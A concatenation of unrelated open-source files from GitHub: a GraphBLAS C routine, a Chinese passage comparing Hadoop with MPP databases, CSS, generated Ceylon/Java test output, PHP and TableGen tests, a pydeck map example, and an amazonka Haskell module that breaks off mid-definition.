  // currying for arity 3 ...
  const curry3 = compose(curry, curry);
  equal(
    curry3(g)(1)(2)(3),
    6
  );
  // ... and folding three curries together does the same for arity 4.
  const h = (a, b, c, d) => a + b + c + d;
  const curry4 = reduce(compose, [curry, curry, curry]);
  equal(
    curry4(h)(1)(2)(3)(4),
    10
  );
});
| {
"pile_set_name": "Github"
} |
//------------------------------------------------------------------------------
// GB_assign_zombie5: delete entries in C for C_replace_phase
//------------------------------------------------------------------------------
// SuiteSparse:GraphBLAS, Timothy A. Davis, (c) 2017-2020, All Rights Reserved.
// http://suitesparse.com See GraphBLAS/Doc/License.txt for license.
//------------------------------------------------------------------------------
// For GrB_Matrix_assign, C(I,J)<M,repl>=..., if C_replace is true, and mask M
// is present, then any entry C(i,j) outside IxJ must be be deleted, if
// M(i,j)=0.
// See also GB_assign_zombie3 and GB_assign_zombie4.
#include "GB_assign.h"
#include "GB_ek_slice.h"
#define GB_FREE_WORK \
GB_ek_slice_free (&pstart_slice, &kfirst_slice, &klast_slice, ntasks) ;
GrB_Info GB_assign_zombie5
(
    GrB_Matrix Z,                   // the matrix C, or a copy
    const GrB_Matrix M,
    const bool Mask_comp,
    const bool Mask_struct,
    const GrB_Index *I,
    const int64_t nI,
    const int Ikind,
    const int64_t Icolon [3],
    const GrB_Index *J,
    const int64_t nJ,
    const int Jkind,
    const int64_t Jcolon [3],
    GB_Context Context
)
{

    //--------------------------------------------------------------------------
    // get Z
    //--------------------------------------------------------------------------

    const int64_t *GB_RESTRICT Zh = Z->h ;
    const int64_t *GB_RESTRICT Zp = Z->p ;
    // const int64_t Znvec = Z->nvec ;
    // Zi is modified in place: a "zombie" is an entry flagged for deletion by
    // flipping (negating) its row index with GB_FLIP; it is pruned later.
    int64_t *GB_RESTRICT Zi = Z->i ;
    int64_t nzombies = Z->nzombies ;
    const int64_t znz = GB_NNZ (Z) ;

    //--------------------------------------------------------------------------
    // get M
    //--------------------------------------------------------------------------

    const int64_t *GB_RESTRICT Mh = M->h ;
    const int64_t *GB_RESTRICT Mp = M->p ;
    const int64_t *GB_RESTRICT Mi = M->i ;
    // Mx is NULL for a structural mask: presence of an entry means true.
    const GB_void *GB_RESTRICT Mx = (Mask_struct ? NULL : (M->x)) ;
    const size_t msize = M->type->size ;
    const int64_t Mnvec = M->nvec ;
    const bool M_is_hyper = M->is_hyper ;

    //--------------------------------------------------------------------------
    // determine the number of threads to use
    //--------------------------------------------------------------------------

    GB_GET_NTHREADS_MAX (nthreads_max, chunk, Context) ;
    int nthreads = GB_nthreads (znz, chunk, nthreads_max) ;
    int ntasks = (nthreads == 1) ? 1 : (64 * nthreads) ;
    ntasks = GB_IMIN (ntasks, znz) ;
    ntasks = GB_IMAX (ntasks, 1) ;

    //--------------------------------------------------------------------------
    // slice the entries for each task
    //--------------------------------------------------------------------------

    // Task tid does entries pstart_slice [tid] to pstart_slice [tid+1]-1 and
    // vectors kfirst_slice [tid] to klast_slice [tid].  The first and last
    // vectors may be shared with prior slices and subsequent slices.

    int64_t *pstart_slice = NULL, *kfirst_slice = NULL, *klast_slice = NULL ;
    if (!GB_ek_slice (&pstart_slice, &kfirst_slice, &klast_slice, Z, ntasks))
    {
        // out of memory
        return (GB_OUT_OF_MEMORY) ;
    }

    //--------------------------------------------------------------------------
    // each task creates its own zombies
    //--------------------------------------------------------------------------

    // tasks only write to disjoint slices of Zi, so the sole shared update
    // is the zombie count, combined via the OpenMP reduction below
    int tid ;
    #pragma omp parallel for num_threads(nthreads) schedule(dynamic,1) \
        reduction(+:nzombies)
    for (tid = 0 ; tid < ntasks ; tid++)
    {

        //----------------------------------------------------------------------
        // get the task description
        //----------------------------------------------------------------------

        int64_t kfirst = kfirst_slice [tid] ;
        int64_t klast  = klast_slice  [tid] ;

        //----------------------------------------------------------------------
        // scan vectors kfirst to klast for entries to delete
        //----------------------------------------------------------------------

        for (int64_t k = kfirst ; k <= klast ; k++)
        {

            //------------------------------------------------------------------
            // get Z(:,j) and determine if j is outside the list J
            //------------------------------------------------------------------

            int64_t j = (Zh == NULL) ? k : Zh [k] ;
            // j_outside is true if column j is outside the Z(I,J) submatrix
            bool j_outside = !GB_ij_is_in_list (J, nJ, j, Jkind, Jcolon) ;
            int64_t pZ_start, pZ_end ;
            GB_get_pA_and_pC (&pZ_start, &pZ_end, NULL,
                tid, k, kfirst, klast, pstart_slice, NULL, NULL, Zp) ;

            //------------------------------------------------------------------
            // get M(:,j)
            //------------------------------------------------------------------

            int64_t pM_start, pM_end ;
            int64_t pleft = 0 ;
            int64_t pright = Mnvec - 1 ;
            GB_lookup (M_is_hyper, Mh, Mp, &pleft, pright, j,
                &pM_start, &pM_end) ;

            //------------------------------------------------------------------
            // iterate over all entries in Z(:,j)
            //------------------------------------------------------------------

            for (int64_t pZ = pZ_start ; pZ < pZ_end ; pZ++)
            {

                //--------------------------------------------------------------
                // consider Z(i,j)
                //--------------------------------------------------------------

                // Z(i,j) is outside the Z(I,J) submatrix if either i is
                // not in the list I, or j is not in J, or both.
                int64_t i = Zi [pZ] ;
                if (!GB_IS_ZOMBIE (i) &&
                    (j_outside || !GB_ij_is_in_list (I, nI, i, Ikind, Icolon)))
                {

                    //----------------------------------------------------------
                    // Z(i,j) is a live entry not in the Z(I,J) submatrix
                    //----------------------------------------------------------

                    // Check the mask M to see if it should be deleted.
                    // Binary search of M(:,j) for row index i.
                    int64_t pM     = pM_start ;
                    int64_t pright = pM_end - 1 ;
                    bool found ;
                    GB_BINARY_SEARCH (i, Mi, pM, pright, found) ;
                    bool mij = false ;
                    if (found)
                    {
                        // found it
                        mij = GB_mcast (Mx, pM, msize) ;
                    }
                    if (Mask_comp)
                    {
                        // negate the mask if Mask_comp is true
                        mij = !mij ;
                    }
                    if (!mij)
                    {
                        // delete Z(i,j) by marking it as a zombie
                        nzombies++ ;
                        Zi [pZ] = GB_FLIP (i) ;
                    }
                }
            }
        }
    }

    //--------------------------------------------------------------------------
    // free workspace and return result
    //--------------------------------------------------------------------------

    Z->nzombies = nzombies ;
    GB_FREE_WORK ;
    return (GrB_SUCCESS) ;
}
| {
"pile_set_name": "Github"
} |
# Hadoop 与分布式数据库对比
正如我们所看到的,Hadoop 有点像 Unix 的分布式版本,其中 HDFS 是文件系统,而 MapReduce 是 Unix 进程的怪异实现(总是在 Map 阶段和 Reduce 阶段运行 sort 工具)。我们了解了如何在这些原语的基础上实现各种连接和分组操作。当 MapReduce 论文发表时,它从某种意义上来说已经不算新鲜了。我们在前几节中讨论的所有处理和并行连接算法已经在十多年前所谓的**大规模并行处理(MPP,massively parallel processing)**数据库中实现了。比如 Gamma database machine,Teradata 和 Tandem NonStop SQL 就是这方面的先驱。
最大的区别是,MPP 数据库专注于在一组机器上并行执行分析 SQL 查询,而 MapReduce 和分布式文件系统的组合则更像是一个可以运行任意程序的通用操作系统。
# 存储多样性
数据库要求你根据特定的模型(例如关系或文档)来构造数据,而分布式文件系统中的文件只是字节序列,可以使用任何数据模型和编码来编写。它们可能是数据库记录的集合,但同样可以是文本,图像,视频,传感器读数,稀疏矩阵,特征向量,基因组序列或任何其他类型的数据。说白了,Hadoop 开放了将数据不加区分地转储到 HDFS 的可能性,允许后续再研究如何进一步处理。相比之下,在将数据导入数据库专有存储格式之前,MPP 数据库通常需要对数据和查询模式进行仔细的前期建模。在纯粹主义者看来,这种仔细的建模和导入似乎是可取的,因为这意味着数据库的用户有更高质量的数据来处理。然而实践经验表明,简单地使数据快速可用:即使它很古怪,难以使用,使用原始格式:也通常要比事先决定理想数据模型要更有价值。
这个想法与数据仓库类似:将大型组织的各个部分的数据集中在一起是很有价值的,因为它可以跨越以前相分离的数据集进行连接。MPP 数据库所要求的谨慎模式设计拖慢了集中式数据收集速度;以原始形式收集数据,稍后再操心模式的设计,能使数据收集速度加快(有时被称为“数据湖(data lake)”或“企业数据中心(enterprise data hub)”)。
不加区分的数据转储转移了解释数据的负担:数据集的生产者不再需要强制将其转化为标准格式,数据的解释成为消费者的问题(读时模式方法;参阅“文档模型中的架构灵活性”)。如果生产者和消费者是不同优先级的不同团队,这可能是一种优势。甚至可能不存在一个理想的数据模型,对于不同目的有不同的合适视角。以原始形式简单地转储数据,可以允许多种这样的转换。这种方法被称为寿司原则(sushi principle):“原始数据更好”。
因此,Hadoop 经常被用于实现 ETL 过程:事务处理系统中的数据以某种原始形式转储到分布式文件系统中,然后编写 MapReduce 作业来清理数据,将其转换为关系形式,并将其导入 MPP 数据仓库以进行分析。数据建模仍然在进行,但它在一个单独的步骤中进行,与数据收集相解耦。这种解耦是可行的,因为分布式文件系统支持以任何格式编码的数据。
# 处理模型多样性
MPP 数据库是单体的,紧密集成的软件,负责磁盘上的存储布局,查询计划,调度和执行。由于这些组件都可以针对数据库的特定需求进行调整和优化,因此整个系统可以在其设计针对的查询类型上取得非常好的性能。而且,SQL 查询语言允许以优雅的语法表达查询,而无需编写代码,使业务分析师用来做商业分析的可视化工具(例如 Tableau)能够访问。另一方面,并非所有类型的处理都可以合理地表达为 SQL 查询。例如,如果要构建机器学习和推荐系统,或者使用相关性排名模型的全文搜索索引,或者执行图像分析,则很可能需要更一般的数据处理模型。这些类型的处理通常是特别针对特定应用的(例如机器学习的特征工程,机器翻译的自然语言模型,欺诈预测的风险评估函数),因此它们不可避免地需要编写代码,而不仅仅是查询。
MapReduce 使工程师能够轻松地在大型数据集上运行自己的代码。如果你有 HDFS 和 MapReduce,那么你可以在它之上建立一个 SQL 查询执行引擎,事实上这正是 Hive 项目所做的。但是,你也可以编写许多其他形式的批处理,这些批处理不必非要用 SQL 查询表示。随后,人们发现 MapReduce 对于某些类型的处理而言局限性很大,表现很差,因此在 Hadoop 之上其他各种处理模型也被开发出来。有两种处理模型,SQL 和 MapReduce,还不够,需要更多不同的模型!而且由于 Hadoop 平台的开放性,实施一整套方法是可行的,而这在单体 MPP 数据库的范畴内是不可能的。
至关重要的是,这些不同的处理模型都可以在共享的单个机器集群上运行,所有这些机器都可以访问分布式文件系统上的相同文件。在 Hadoop 方法中,不需要将数据导入到几个不同的专用系统中进行不同类型的处理:系统足够灵活,可以支持同一个群集内不同的工作负载。不需要移动数据,使得从数据中挖掘价值变得容易得多,也使采用新的处理模型容易的多。Hadoop 生态系统包括随机访问的 OLTP 数据库,如 HBase 和 MPP 风格的分析型数据库,如 Impala 。HBase 与 Impala 都不使用 MapReduce,但都使用 HDFS 进行存储。它们是迥异的数据访问与处理方法,但是它们可以共存,并被集成到同一个系统中。
# 针对频繁故障设计
当比较 MapReduce 和 MPP 数据库时,两种不同的设计思路出现了:处理故障和使用内存与磁盘的方式。与在线系统相比,批处理对故障不太敏感,因为就算失败也不会立即影响到用户,而且它们总是能再次运行。如果一个节点在执行查询时崩溃,大多数 MPP 数据库会中止整个查询,并让用户重新提交查询或自动重新运行它。由于查询通常最多运行几秒钟或几分钟,所以这种错误处理的方法是可以接受的,因为重试的代价不是太大。MPP 数据库还倾向于在内存中保留尽可能多的数据(例如,使用散列连接)以避免从磁盘读取的开销。
另一方面,MapReduce 可以通过以单个任务的粒度重试工作,容忍单个 Map 或 Reduce 任务的失败,而不会影响作业的整体。它也会非常急切地将数据写入磁盘,一方面是为了容错,另一方面是因为假设数据集太大而不能完全放入内存。
MapReduce 方式更适用于较大的作业:要处理如此之多的数据并运行很长时间的作业,以至于在此过程中很可能至少遇到一个任务故障。在这种情况下,由于单个任务失败而重新运行整个作业将是非常浪费的。即使以单个任务的粒度进行恢复引入了使得无故障处理更慢的开销,但如果任务失败率足够高,这仍然是一种合理的权衡。但是这些假设有多么现实呢?在大多数集群中,机器故障确实会发生,但是它们不是很频繁:可能少到绝大多数作业都不会经历机器故障。为了容错,真的值得带来这么大的额外开销吗?
要了解 MapReduce 节约使用内存和在任务的层次进行恢复的原因,了解最初设计 MapReduce 的环境是很有帮助的。Google 有着混用的数据中心,在线生产服务和离线批处理作业在同样机器上运行。每个任务都有一个通过容器强制执行的资源配给(CPU 核心,RAM,磁盘空间等)。每个任务也具有优先级,如果优先级较高的任务需要更多的资源,则可以终止(抢占)同一台机器上较低优先级的任务以释放资源。优先级还决定了计算资源的定价:团队必须为他们使用的资源付费,而优先级更高的进程花费更多。
这种架构允许非生产(低优先级)计算资源被过量使用(overcommitted),因为系统知道必要时它可以回收资源。与分离生产和非生产任务的系统相比,过量使用资源可以更好地利用机器并提高效率。但由于 MapReduce 作业以低优先级运行,它们随时都有被抢占的风险,因为优先级较高的进程可能需要其资源。在高优先级进程拿走所需资源后,批量作业能有效地“捡面包屑”,利用剩下的任何计算资源。在谷歌,运行一个小时的 MapReduce 任务有大约有 5%的风险被终止,为了给更高优先级的进程挪地方。这一概率比硬件问题,机器重启或其他原因的概率高了一个数量级。按照这种抢占率,如果一个作业有 100 个任务,每个任务运行 10 分钟,那么至少有一个任务在完成之前被终止的风险大于 50%。
这就是 MapReduce 被设计为容忍频繁意外任务终止的原因:不是因为硬件很不可靠,而是因为任意终止进程的自由有利于提高计算集群中的资源利用率。在开源的集群调度器中,抢占的使用较少。YARN 的 CapacityScheduler 支持抢占,以平衡不同队列的资源分配,但在编写本文时,YARN,Mesos 或 Kubernetes 不支持通用优先级抢占。在任务不经常被终止的环境中,MapReduce 的这一设计决策就没有多少意义了。在下一节中,我们将研究一些与 MapReduce 设计决策相异的替代方案。
| {
"pile_set_name": "Github"
} |
/*
Copyright 2010, Google Inc.
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are
met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the following disclaimer
in the documentation and/or other materials provided with the
distribution.
* Neither the name of Google Inc. nor the names of its
contributors may be used to endorse or promote products derived from
this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
/*
 * Styles for the expression-preview dialog: the tab strip, the expression
 * code editor, the live preview table, and the help/history/starred panes.
 *
 * NOTE(review): "@import-less" appears to be this project's build-time
 * directive for inlining another .less file — confirm against the theme
 * pipeline before changing it to a plain @import.
 */
@import-less url("../theme.less");

/* Tighten the tab strip inside the dialog. */
#expression-preview-tabs .ui-tabs-nav li a {
  padding: 0.15em 1em;
}

/* The expression input: fixed-height monospace editor. */
textarea.expression-preview-code {
  font-family: monospace;
  height: 5em;
  vertical-align: top;
}

/* Parser feedback shown while typing; turns red on a parse error. */
.expression-preview-parsing-status {
  color: @light_grey;
}
.expression-preview-parsing-status.error {
  color: red;
}

/* The four tab panes share padding and clip their own overflow. */
#expression-preview-tabs-preview,
#expression-preview-tabs-help,
#expression-preview-tabs-history,
#expression-preview-tabs-starred {
  padding: @padding_tight;
  overflow: hidden;
}

/* Fixed-height scrollable area of each pane.
   NOTE(review): the starred pane is targeted directly while the other three
   target a "> div" wrapper — presumably the starred pane has different
   markup; verify before "normalizing" these selectors. */
#expression-preview-tabs-preview > div,
#expression-preview-tabs-help > div,
#expression-preview-tabs-history > div,
#expression-preview-tabs-starred {
  height: 200px;
  overflow: auto;
}

/* Cell padding for the tables rendered inside every pane. */
#expression-preview-tabs-preview td, #expression-preview-tabs-preview th,
#expression-preview-tabs-help td, #expression-preview-tabs-help th,
#expression-preview-tabs-history td, #expression-preview-tabs-history th,
#expression-preview-tabs-starred td, #expression-preview-tabs-starred th {
  padding: @padding_tight;
}

.expression-preview-table-wrapper {
  padding: @padding_normal;
}

/* Row separators in the preview table. */
.expression-preview-container td {
  padding: 2px 5px;
  border-top: 1px solid #ccc;
}
td.expression-preview-heading {
  border-top: none;
  background: #ddd;
  font-weight: bold;
}

/* Evaluated cell values: wrap long output, cap the column width. */
td.expression-preview-value {
  max-width: 250px !important;
  white-space: pre-wrap;
  overflow-x: hidden;
}

/* Rendering of null/error/other non-plain values. */
.expression-preview-special-value {
  color: #aaa;
}

/* Section headings inside the built-in help pane. */
.expression-preview-help-container h3 {
  margin-top: @padding_looser;
  margin-bottom: @padding_normal;
  border-bottom: 1px solid @light_grey;
}

/* Per-function documentation rows: title / params / returns / description.
   The empty rules are kept as documented styling hooks. */
.expression-preview-doc-item-title {
  font-weight: bold;
  text-align: right;
}
.expression-preview-doc-item-params {
}
.expression-preview-doc-item-returns {
}
.expression-preview-doc-item-desc {
  color: #666;
}
| {
"pile_set_name": "Github"
} |
package org.eclipse.ceylon.compiler.java.test.annotations;
// Compiler-generated expected output (Ceylon-to-Java test fixture): holder
// class for the immutable toplevel Ceylon value `attr1`.  The leading "."
// on qualified names is the test suite's fully-qualified-reference notation,
// not ordinary Java source.
@.org.eclipse.ceylon.compiler.java.metadata.Ceylon(
        major = 8,
        minor = 1)
@.org.eclipse.ceylon.compiler.java.metadata.Attribute
@.org.eclipse.ceylon.compiler.java.metadata.Name("attr1")
final class attr1_ {
    // Static holder only — never instantiated.
    private attr1_() {
    }
    // Backing field; final because `attr1` is not declared `variable`.
    private static final long $object$;
    @.org.eclipse.ceylon.compiler.java.metadata.Ignore
    private static volatile boolean $init$$object$ = false;
    // Any failure during static initialization is captured here and
    // rethrown lazily on first access instead of at class-load time.
    private static final .java.lang.Throwable $initException$;
    static {
        try {
            $object$ = 1L;
            .org.eclipse.ceylon.compiler.java.test.annotations.attr1_.$init$$object$ = true;
            $initException$ = null;
        } catch (.java.lang.Throwable x) {
            $initException$ = x;
            $object$ = 0L;
            .org.eclipse.ceylon.compiler.java.test.annotations.attr1_.$init$$object$ = false;
        }
    }
    // Getter for `attr1`: rethrows a deferred init failure, otherwise a
    // read before initialization indicates a cyclic-initialization error.
    public static long get_() {
        if (.org.eclipse.ceylon.compiler.java.test.annotations.attr1_.$init$$object$) {
            return .org.eclipse.ceylon.compiler.java.test.annotations.attr1_.$object$;
        } else {
            if ($initException$ != null) .org.eclipse.ceylon.compiler.java.Util.rethrow($initException$);
            throw new .ceylon.language.InitializationError("Cyclic initialization trying to read the value of \'attr1\' before it was set");
        }
    }
}
// Compiler-generated expected output: holder class for the mutable
// (`variable`-annotated) toplevel Ceylon value `attr2`.  Unlike attr1_,
// the backing field is non-final and a setter is emitted.
@.org.eclipse.ceylon.compiler.java.metadata.Ceylon(
        major = 8,
        minor = 1)
@.org.eclipse.ceylon.compiler.java.metadata.Attribute
@.org.eclipse.ceylon.compiler.java.metadata.Name("attr2")
final class attr2_ {
    // Static holder only — never instantiated.
    private attr2_() {
    }
    // Non-final backing field: `attr2` is declared `variable`.
    private static long $object$;
    @.org.eclipse.ceylon.compiler.java.metadata.Ignore
    private static volatile boolean $init$$object$ = false;
    // Deferred static-initialization failure, rethrown on first access.
    private static final .java.lang.Throwable $initException$;
    static {
        try {
            .org.eclipse.ceylon.compiler.java.test.annotations.attr2_.$object$ = 1L;
            .org.eclipse.ceylon.compiler.java.test.annotations.attr2_.$init$$object$ = true;
            $initException$ = null;
        } catch (.java.lang.Throwable x) {
            $initException$ = x;
            .org.eclipse.ceylon.compiler.java.test.annotations.attr2_.$object$ = 0L;
            .org.eclipse.ceylon.compiler.java.test.annotations.attr2_.$init$$object$ = false;
        }
    }
    // Getter for `attr2` (marked with the Ceylon `variable` annotation).
    @.ceylon.language.VariableAnnotation$annotation$
    public static long get_() {
        if (.org.eclipse.ceylon.compiler.java.test.annotations.attr2_.$init$$object$) {
            return .org.eclipse.ceylon.compiler.java.test.annotations.attr2_.$object$;
        } else {
            if ($initException$ != null) .org.eclipse.ceylon.compiler.java.Util.rethrow($initException$);
            throw new .ceylon.language.InitializationError("Cyclic initialization trying to read the value of \'attr2\' before it was set");
        }
    }
    // Setter: refuses to run if static initialization previously failed.
    public static void set_(@.org.eclipse.ceylon.compiler.java.metadata.Name("attr2")
    final long attr2) {
        if ($initException$ != null) .org.eclipse.ceylon.compiler.java.Util.rethrow($initException$);
        .org.eclipse.ceylon.compiler.java.test.annotations.attr2_.$object$ = attr2;
    }
}
// Compiler-generated expected output: holder for the computed toplevel
// Ceylon getter `attr3` — no backing field, the value is recomputed on
// every access (hence the Transient metadata annotation).
@.org.eclipse.ceylon.compiler.java.metadata.Ceylon(
        major = 8,
        minor = 1)
@.org.eclipse.ceylon.compiler.java.metadata.Attribute
@.org.eclipse.ceylon.compiler.java.metadata.Name("attr3")
final class attr3_ {
    // Static holder only — never instantiated.
    private attr3_() {
    }
    @.org.eclipse.ceylon.compiler.java.metadata.Transient
    public static long get_() {
        return 1L;
    }
}
// Compiler-generated expected output: holder for the computed toplevel
// Ceylon getter/setter pair `attr4` — a transient getter plus a setter
// whose assign block is empty, hence the no-op set_().
@.org.eclipse.ceylon.compiler.java.metadata.Ceylon(
        major = 8,
        minor = 1)
@.org.eclipse.ceylon.compiler.java.metadata.Attribute
@.org.eclipse.ceylon.compiler.java.metadata.Name("attr4")
final class attr4_ {
    // Static holder only — never instantiated.
    private attr4_() {
    }
    @.org.eclipse.ceylon.compiler.java.metadata.Transient
    public static long get_() {
        return 1L;
    }
    // Intentionally empty: the Ceylon source declares no assign behaviour.
    public static void set_(@.org.eclipse.ceylon.compiler.java.metadata.Name("attr4")
    final long attr4) {
    }
} | {
"pile_set_name": "Github"
} |
--TEST--
SPL: Spl File Info test getOwner
--CREDITS--
Cesare D'Amico <[email protected]>
Andrea Giorgini <[email protected]>
Filippo De Santis <[email protected]>
Daniel Londero <[email protected]>
Francesco Trucchia <[email protected]>
Jacopo Romei <[email protected]>
#Test Fest Cesena (Italy) on 2009-06-20
--SKIPIF--
<?php
if (substr(PHP_OS, 0, 3) == 'WIN') die("skip this test not for Windows platforms");
?>
--FILE--
<?php
// file: point SplFileInfo at a path that does not exist on disk.
// getOwner() must fail the underlying stat() and throw a RuntimeException
// (matched by the --EXPECTF-- section below) rather than return an owner id.
$fileInfo = new SplFileInfo('not_existing');
var_dump($fileInfo->getOwner());
?>
--EXPECTF--
Fatal error: Uncaught exception 'RuntimeException' with message 'SplFileInfo::getOwner(): stat failed for not_existing' in %s
Stack trace:
#0 %s: SplFileInfo->getOwner()
#1 {main}
thrown in %s on line %d
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="utf-8"?>
<!-- Placeholder artwork for a genre item: a gradient background with the
     genre vector icon inset by @dimen/placeholder_genre_padding on all
     four edges. -->
<layer-list xmlns:android="http://schemas.android.com/apk/res/android">
    <!-- Bottom layer: full-bleed gradient background. -->
    <item android:drawable="@drawable/placeholder_gradient"/>
    <!-- Top layer: the genre icon, padded on every edge. -->
    <item android:drawable="@drawable/vd_genre"
        android:top="@dimen/placeholder_genre_padding"
        android:bottom="@dimen/placeholder_genre_padding"
        android:left="@dimen/placeholder_genre_padding"
        android:right="@dimen/placeholder_genre_padding"/>
</layer-list> | {
"pile_set_name": "Github"
} |
// RUN: llvm-tblgen -gen-disassembler -I %p/../../include %s | FileCheck %s

// Check that we don't generate invalid code of the form "( && Cond2)" when
// emitting AssemblerPredicate conditions. In the example below, the invalid
// code would be: "return ( && (Bits & arch::AssemblerCondition2));".

include "llvm/Target/Target.td"

// Minimal target scaffolding so the disassembler emitter has something to
// process.
def archInstrInfo : InstrInfo { }

def arch : Target {
  let InstructionSet = archInstrInfo;
}

// Pred1 has no AssemblerPredicate, so it must contribute nothing to the
// emitted condition; only Pred2's assembler condition should appear.
def Pred1 : Predicate<"Condition1">;
def Pred2 : Predicate<"Condition2">,
            AssemblerPredicate<"AssemblerCondition2">;

def foo : Instruction {
  let Size = 2;
  let OutOperandList = (outs);
  let InOperandList = (ins);
  field bits<16> Inst;
  let Inst = 0xAAAA;
  let AsmString = "foo";
  field bits<16> SoftFail = 0;
  // This is the important bit:
  let Predicates = [Pred1, Pred2];
}

// CHECK: return (Bits[arch::AssemblerCondition2]);
| {
"pile_set_name": "Github"
} |
"""
GeoJsonLayer
===========
Property values in Vancouver, Canada, adapted from the deck.gl example pages. Input data is in a GeoJSON format.
"""
import pydeck

# GeoJSON of Vancouver city blocks, annotated with value-per-square-metre
# and growth properties (from the deck.gl sample-data repository).
DATA_URL = "https://raw.githubusercontent.com/visgl/deck.gl-data/master/examples/geojson/vancouver-blocks.json"

# A single rectangle spanning the Vancouver area, rendered as a translucent
# ground plane beneath the data layer.
LAND_COVER = [[[-123.0, 49.196], [-123.0, 49.324], [-123.306, 49.324], [-123.306, 49.196]]]

# Camera centred on Vancouver, pitched so the extruded blocks are visible.
INITIAL_VIEW_STATE = pydeck.ViewState(latitude=49.254, longitude=-123.13, zoom=11, max_zoom=16, pitch=45, bearing=0)

# Flat land-cover polygon drawn underneath the property data.
ground_layer = pydeck.Layer(
    "PolygonLayer",
    LAND_COVER,
    stroked=False,
    # processes the data as a flat longitude-latitude pair
    get_polygon="-",
    get_fill_color=[0, 0, 0, 20],
)

# City blocks extruded by property value and coloured by growth rate.
blocks_layer = pydeck.Layer(
    "GeoJsonLayer",
    DATA_URL,
    opacity=0.8,
    stroked=False,
    filled=True,
    extruded=True,
    wireframe=True,
    get_elevation="properties.valuePerSqm / 20",
    get_fill_color="[255, 255, properties.growth * 255]",
    get_line_color=[255, 255, 255],
)

# Layer order matters: the ground plane must be listed first so the blocks
# render on top of it.
deck = pydeck.Deck(layers=[ground_layer, blocks_layer], initial_view_state=INITIAL_VIEW_STATE)
deck.to_html("geojson_layer.html")
"pile_set_name": "Github"
} |
{-# LANGUAGE DeriveDataTypeable #-}
{-# LANGUAGE DeriveGeneric #-}
{-# LANGUAGE OverloadedStrings #-}
{-# LANGUAGE RecordWildCards #-}
{-# LANGUAGE TypeFamilies #-}
{-# OPTIONS_GHC -fno-warn-unused-imports #-}
{-# OPTIONS_GHC -fno-warn-unused-binds #-}
{-# OPTIONS_GHC -fno-warn-unused-matches #-}
-- Derived from AWS service descriptions, licensed under Apache 2.0.
-- |
-- Module : Network.AWS.MachineLearning.DescribeTags
-- Copyright : (c) 2013-2018 Brendan Hay
-- License : Mozilla Public License, v. 2.0.
-- Maintainer : Brendan Hay <[email protected]>
-- Stability : auto-generated
-- Portability : non-portable (GHC extensions)
--
-- Describes one or more of the tags for your Amazon ML object.
--
--
module Network.AWS.MachineLearning.DescribeTags
(
-- * Creating a Request
describeTags
, DescribeTags
-- * Request Lenses
, dtResourceId
, dtResourceType
-- * Destructuring the Response
, describeTagsResponse
, DescribeTagsResponse
-- * Response Lenses
, dtrsResourceId
, dtrsResourceType
, dtrsTags
, dtrsResponseStatus
) where
import Network.AWS.Lens
import Network.AWS.MachineLearning.Types
import Network.AWS.MachineLearning.Types.Product
import Network.AWS.Prelude
import Network.AWS.Request
import Network.AWS.Response
-- | /See:/ 'describeTags' smart constructor.
data DescribeTags = DescribeTags'
  { _dtResourceId   :: !Text
  , _dtResourceType :: !TaggableResourceType
  } deriving (Eq, Read, Show, Data, Typeable, Generic)

-- | Creates a value of 'DescribeTags' with the minimum fields required to make a request.
--
-- Use one of the following lenses to modify other fields as desired:
--
-- * 'dtResourceId' - The ID of the ML object. For example, @exampleModelId@ .
--
-- * 'dtResourceType' - The type of the ML object.
describeTags
  :: Text -- ^ 'dtResourceId'
  -> TaggableResourceType -- ^ 'dtResourceType'
  -> DescribeTags
describeTags pResourceId_ pResourceType_ =
  DescribeTags' {_dtResourceId = pResourceId_, _dtResourceType = pResourceType_}

-- | The ID of the ML object. For example, @exampleModelId@ .
dtResourceId :: Lens' DescribeTags Text
dtResourceId = lens _dtResourceId (\ s a -> s{_dtResourceId = a})

-- | The type of the ML object.
dtResourceType :: Lens' DescribeTags TaggableResourceType
dtResourceType = lens _dtResourceType (\ s a -> s{_dtResourceType = a})

-- Wire format: a JSON-RPC style POST.  All three response fields are
-- optional in the JSON; "Tags" is defaulted to an empty list ('.!@'
-- 'mempty') when absent, and the HTTP status code is captured as an Int.
instance AWSRequest DescribeTags where
        type Rs DescribeTags = DescribeTagsResponse
        request = postJSON machineLearning
        response
          = receiveJSON
              (\ s h x ->
                 DescribeTagsResponse' <$>
                   (x .?> "ResourceId") <*> (x .?> "ResourceType") <*>
                     (x .?> "Tags" .!@ mempty)
                     <*> (pure (fromEnum s)))

instance Hashable DescribeTags where

instance NFData DescribeTags where

-- The service dispatches on the X-Amz-Target header rather than the path.
instance ToHeaders DescribeTags where
        toHeaders
          = const
              (mconcat
                 ["X-Amz-Target" =#
                    ("AmazonML_20141212.DescribeTags" :: ByteString),
                  "Content-Type" =#
                    ("application/x-amz-json-1.1" :: ByteString)])

instance ToJSON DescribeTags where
        toJSON DescribeTags'{..}
          = object
              (catMaybes
                 [Just ("ResourceId" .= _dtResourceId),
                  Just ("ResourceType" .= _dtResourceType)])

instance ToPath DescribeTags where
        toPath = const "/"

instance ToQuery DescribeTags where
        toQuery = const mempty

-- | Amazon ML returns the following elements.
--
--
--
-- /See:/ 'describeTagsResponse' smart constructor.
data DescribeTagsResponse = DescribeTagsResponse'
